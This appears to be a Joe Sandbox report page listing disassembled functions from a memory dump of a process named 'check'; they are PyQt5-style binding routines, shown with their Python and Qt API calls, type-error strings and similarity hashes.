Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Dealloc$Err_$Data@@List$?dispose@ClearData@1@@$Iter_Nextmemcpy$?detach_grow@Data@1@FlagsFormatIterObject_OccurredType_
String ID: index %zd has type '%s' but 'QOpenGLContext' is expected
API String ID: 1419802644-1113130771
Opcode ID: e8e3ba883f3901940b4f496a05ab96a58152909547f9739deeccc6e952297417
Instruction ID: 7470597e17c4dd3ed68911af190a012b97a8362aa2301bdb4e35b725ee607766
Opcode Fuzzy Hash: e8e3ba883f3901940b4f496a05ab96a58152909547f9739deeccc6e952297417
Instruction Fuzzy Hash: 2EA14432B09A4686EA60DB15E8683BD73A0FB95BA1F498431CE4E53B54DF3DE955C300

Function 00007FFD8628EF90 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFD8628EFB2
PyErr_Clear.PYTHON3 ref: 00007FFD8628EFC0
_Py_Dealloc.PYTHON3 ref: 00007FFD8628EFD4
PyType_GetFlags.PYTHON3 ref: 00007FFD8628EFDE
PyErr_Clear.PYTHON3 ref: 00007FFD8628F047
PyIter_Next.PYTHON3 ref: 00007FFD8628F050
?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFD8628F0D8
memcpy.VCRUNTIME140 ref: 00007FFD8628F11C
memcpy.VCRUNTIME140 ref: 00007FFD8628F166
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD8628F185
_Py_Dealloc.PYTHON3 ref: 00007FFD8628F1BE
PyErr_Clear.PYTHON3 ref: 00007FFD8628F1C7
PyIter_Next.PYTHON3 ref: 00007FFD8628F1D0
PyErr_Occurred.PYTHON3 ref: 00007FFD8628F1F0
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD8628F218
_Py_Dealloc.PYTHON3 ref: 00007FFD8628F234
PyErr_Format.PYTHON3 ref: 00007FFD8628F289
_Py_Dealloc.PYTHON3 ref: 00007FFD8628F298
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD8628F2B7
_Py_Dealloc.PYTHON3 ref: 00007FFD8628F2D7
_Py_Dealloc.PYTHON3 ref: 00007FFD8628F2EB

Strings

index %zd has type '%s' but 'QOpenGLShader' is expected, xrefs: 00007FFD8628F279

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Dealloc$Err_$Data@@List$?dispose@ClearData@1@@$Iter_Nextmemcpy$?detach_grow@Data@1@FlagsFormatIterObject_OccurredType_
String ID: index %zd has type '%s' but 'QOpenGLShader' is expected
API String ID: 1419802644-3380495018
Opcode ID: de7ff6417497ad0095cb842c9bba6d760e9ac21a2bc2863728faf785c675cc30
Instruction ID: 36cda219d35a20be97d23dc15403b4ed6d99fe9c2ddcc764d10be37a2a67bfb7
Opcode Fuzzy Hash: de7ff6417497ad0095cb842c9bba6d760e9ac21a2bc2863728faf785c675cc30
Instruction Fuzzy Hash: 53A14876B09A9682EA609F16E8643BD73A0FF95BA1F484031CE4E43B54DF3DE956C300

Function 00007FFD8623EFE0 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFD8623F002
PyErr_Clear.PYTHON3 ref: 00007FFD8623F010
_Py_Dealloc.PYTHON3 ref: 00007FFD8623F024
PyType_GetFlags.PYTHON3 ref: 00007FFD8623F02E
PyErr_Clear.PYTHON3 ref: 00007FFD8623F097
PyIter_Next.PYTHON3 ref: 00007FFD8623F0A0
?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFD8623F128
memcpy.VCRUNTIME140 ref: 00007FFD8623F16C
memcpy.VCRUNTIME140 ref: 00007FFD8623F1B6
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD8623F1D5
_Py_Dealloc.PYTHON3 ref: 00007FFD8623F20E
PyErr_Clear.PYTHON3 ref: 00007FFD8623F217
PyIter_Next.PYTHON3 ref: 00007FFD8623F220
PyErr_Occurred.PYTHON3 ref: 00007FFD8623F240
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD8623F268
_Py_Dealloc.PYTHON3 ref: 00007FFD8623F284
PyErr_Format.PYTHON3 ref: 00007FFD8623F2D9
_Py_Dealloc.PYTHON3 ref: 00007FFD8623F2E8
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD8623F307
_Py_Dealloc.PYTHON3 ref: 00007FFD8623F327
_Py_Dealloc.PYTHON3 ref: 00007FFD8623F33B

Strings

index %zd has type '%s' but 'QWindow' is expected, xrefs: 00007FFD8623F2C9

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Dealloc$Err_$Data@@List$?dispose@ClearData@1@@$Iter_Nextmemcpy$?detach_grow@Data@1@FlagsFormatIterObject_OccurredType_
String ID: index %zd has type '%s' but 'QWindow' is expected
API String ID: 1419802644-956083577
Opcode ID: e92b0593946e9b7ac05e05cbff450186dea196f63aa271219e127ff41a18ae37
Instruction ID: e8e3e8e72db57021a15cc09c12b83ac97ace8ca11d95301a52e9512051fe206b
Opcode Fuzzy Hash: e92b0593946e9b7ac05e05cbff450186dea196f63aa271219e127ff41a18ae37
Instruction Fuzzy Hash: 5CA14836B09A9682EA609F15EA647BD73A0FB85FA1F484031CE4E47B64DF3DE955C300

Function 00007FFD862521E0 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFD86252202
PyErr_Clear.PYTHON3 ref: 00007FFD86252210
_Py_Dealloc.PYTHON3 ref: 00007FFD86252224
PyType_GetFlags.PYTHON3 ref: 00007FFD8625222E
PyErr_Clear.PYTHON3 ref: 00007FFD86252297
PyIter_Next.PYTHON3 ref: 00007FFD862522A0
?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFD86252328
memcpy.VCRUNTIME140 ref: 00007FFD8625236C
memcpy.VCRUNTIME140 ref: 00007FFD862523B6
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD862523D5
_Py_Dealloc.PYTHON3 ref: 00007FFD8625240E
PyErr_Clear.PYTHON3 ref: 00007FFD86252417
PyIter_Next.PYTHON3 ref: 00007FFD86252420
PyErr_Occurred.PYTHON3 ref: 00007FFD86252440
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD86252468
_Py_Dealloc.PYTHON3 ref: 00007FFD86252484
PyErr_Format.PYTHON3 ref: 00007FFD862524D9
_Py_Dealloc.PYTHON3 ref: 00007FFD862524E8
?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFD86252507
_Py_Dealloc.PYTHON3 ref: 00007FFD86252527
_Py_Dealloc.PYTHON3 ref: 00007FFD8625253B

Strings

index %zd has type '%s' but 'QTextFrame' is expected, xrefs: 00007FFD862524C9

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Dealloc$Err_$Data@@List$?dispose@ClearData@1@@$Iter_Nextmemcpy$?detach_grow@Data@1@FlagsFormatIterObject_OccurredType_
String ID: index %zd has type '%s' but 'QTextFrame' is expected
API String ID: 1419802644-1773808919
Opcode ID: eb3ebe45fcef5e0a33791c2339bb8b6b26442e42b71b5bc5855234904a87f1c5
Instruction ID: b4a1ef1fa14d18e0a2788365e710c6e61b16a3c85f7039c731dcaa632a732585
Opcode Fuzzy Hash: eb3ebe45fcef5e0a33791c2339bb8b6b26442e42b71b5bc5855234904a87f1c5
Instruction Fuzzy Hash: D6A16D36B0AA4682EAA49F15E4697BD7360FF45BA5F484031CE4E53794EF3CE955C300

Function 00007FFD8625AC60 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 215
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFD8625AC83
PyErr_Clear.PYTHON3 ref: 00007FFD8625AC91
_Py_Dealloc.PYTHON3 ref: 00007FFD8625ACA5
PyType_GetFlags.PYTHON3 ref: 00007FFD8625ACAF
?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFD8625AD02
PyErr_Clear.PYTHON3 ref: 00007FFD8625AD0D
PyIter_Next.PYTHON3 ref: 00007FFD8625AD16
PyErr_Clear.PYTHON3 ref: 00007FFD8625AD30
PyLong_AsUnsignedLongMask.PYTHON3 ref: 00007FFD8625AD39
PyErr_Occurred.PYTHON3 ref: 00007FFD8625AD42
?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE ref: 00007FFD8625AD9C
memcpy.VCRUNTIME140 ref: 00007FFD8625ADD5
?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE ref: 00007FFD8625AE18
_Py_Dealloc.PYTHON3 ref: 00007FFD8625AE43
PyErr_Clear.PYTHON3 ref: 00007FFD8625AE4C
PyIter_Next.PYTHON3 ref: 00007FFD8625AE55
PyErr_Occurred.PYTHON3 ref: 00007FFD8625AE71
?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE ref: 00007FFD8625AEA7
_Py_Dealloc.PYTHON3 ref: 00007FFD8625AEC3
PyErr_Format.PYTHON3 ref: 00007FFD8625AF13
_Py_Dealloc.PYTHON3 ref: 00007FFD8625AF26
_Py_Dealloc.PYTHON3 ref: 00007FFD8625AF3A

Strings

index %zd has type '%s' but 'int' is expected, xrefs: 00007FFD8625AF03

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Err_$ArrayDealloc$ClearData@@$U1@_$?deallocate@Iter_NextOccurred$?allocate@?sharedAllocationData@@@@@FlagsFlags@FormatIterLongLong_MaskNull@Object_Option@Type_Unsignedmemcpy
String ID: index %zd has type '%s' but 'int' is expected
API String ID: 485201852-1902674334
Opcode ID: 0e777cf206fc62a5d6801cc5cdcf8b7a289c51ebc77109ea24da7514a15af665
Instruction ID: 11bb5e3aae4894dc05b1ecc0723b6657de894e60200560b08f46decea3b2b69b
Opcode Fuzzy Hash: 0e777cf206fc62a5d6801cc5cdcf8b7a289c51ebc77109ea24da7514a15af665
Instruction Fuzzy Hash: B1813E32B05A4686EB64AF26D86967C73A0FB85FA5F088075CE1E53754EF3CE845C300

Function 00007FFD86270F90 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??0QRegion@@QEAA@XZ.QT5GUI ref: 00007FFD86270FEB
??0QRegion@@QEAA@HHHHW4RegionType@0@@Z.QT5GUI ref: 00007FFD86271094

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

J9|E, xrefs: 00007FFD862710B0
iiii|E, xrefs: 00007FFD8627104C
@J1, xrefs: 00007FFD8627128B

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Region@@$RegionType@0@@malloc
String ID: @J1$J9|E$iiii|E
API String ID: 3332132673-2628389102
Opcode ID: e0b2114d8ac7ca7d452f80c959e58d64d19072f843bff12c90c0f7d5802a9d4c
Instruction ID: aec79a217aed0466d174aae37dc6233ae49e9193e2b17a4b26505da23b0e400d
Opcode Fuzzy Hash: e0b2114d8ac7ca7d452f80c959e58d64d19072f843bff12c90c0f7d5802a9d4c
Instruction Fuzzy Hash: FBC11676B08B418AEB509F65E8A46AD77B4FB89BA4F540035DE8E13B68DF3CD944C700

Function 00007FFD86296AB0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 178COMMON

Download Yara Rule

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFD86296ACF
PyErr_Clear.PYTHON3 ref: 00007FFD86296ADD
_Py_Dealloc.PYTHON3 ref: 00007FFD86296AF1
PyType_GetFlags.PYTHON3 ref: 00007FFD86296AFB
?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE ref: 00007FFD86296B50
PyErr_Clear.PYTHON3 ref: 00007FFD86296B5B
PyIter_Next.PYTHON3 ref: 00007FFD86296B64
_Py_Dealloc.PYTHON3 ref: 00007FFD86296BED
PyErr_Clear.PYTHON3 ref: 00007FFD86296BF6
PyIter_Next.PYTHON3 ref: 00007FFD86296BFF
PyErr_Occurred.PYTHON3 ref: 00007FFD86296C16
?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE ref: 00007FFD86296C4B
_Py_Dealloc.PYTHON3 ref: 00007FFD86296C66
PyErr_Format.PYTHON3 ref: 00007FFD86296CAE
_Py_Dealloc.PYTHON3 ref: 00007FFD86296CBC
?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE ref: 00007FFD86296CE8
_Py_Dealloc.PYTHON3 ref: 00007FFD86296D07
_Py_Dealloc.PYTHON3 ref: 00007FFD86296D1A

Strings

index %zd has type '%s' but 'QSize' is expected, xrefs: 00007FFD86296C9E

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Dealloc$Err_$ArrayClearData@@$?deallocate@Iter_NextU1@_$?sharedFlagsFormatIterNull@Object_OccurredType_
String ID: index %zd has type '%s' but 'QSize' is expected
API String ID: 3520632770-3766856804
Opcode ID: 0bf086c5454f7015dfc0352e31072fc44bba0fbfbee2971102c103a8765562c6
Instruction ID: b04a4f2115e7d9aabbace0a6c7a569601dcf08b083b4651e76efef5161a19a2a
Opcode Fuzzy Hash: 0bf086c5454f7015dfc0352e31072fc44bba0fbfbee2971102c103a8765562c6
Instruction Fuzzy Hash: DE613F22B0964682FA51AF26E828A7D73A0BF85BB5F184570DD1E53794EF3CEC55C300

Function 00007FFD86258A60 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 275COMMON

Download Yara Rule

APIs

PyObject_GetIter.PYTHON3 ref: 00007FFD86258A83
PyErr_Clear.PYTHON3 ref: 00007FFD86258A91
_Py_Dealloc.PYTHON3 ref: 00007FFD86258AA5
PyType_GetFlags.PYTHON3 ref: 00007FFD86258AAF
PyErr_Clear.PYTHON3 ref: 00007FFD86258B1E
PyIter_Next.PYTHON3 ref: 00007FFD86258B27
?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFD86258BAC
?append@QListData@@QEAAPEAPEAXXZ.QT5CORE ref: 00007FFD86258CD8
_Py_Dealloc.PYTHON3 ref: 00007FFD86258D22
PyErr_Clear.PYTHON3 ref: 00007FFD86258D30
PyIter_Next.PYTHON3 ref: 00007FFD86258D39
PyErr_Occurred.PYTHON3 ref: 00007FFD86258D58
_Py_Dealloc.PYTHON3 ref: 00007FFD86258D9F
PyErr_Format.PYTHON3 ref: 00007FFD86258DF6
_Py_Dealloc.PYTHON3 ref: 00007FFD86258E06
_Py_Dealloc.PYTHON3 ref: 00007FFD86258E4D
_Py_Dealloc.PYTHON3 ref: 00007FFD86258E61

Strings

index %zd has type '%s' but 'QTextBlock' is expected, xrefs: 00007FFD86258DE6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
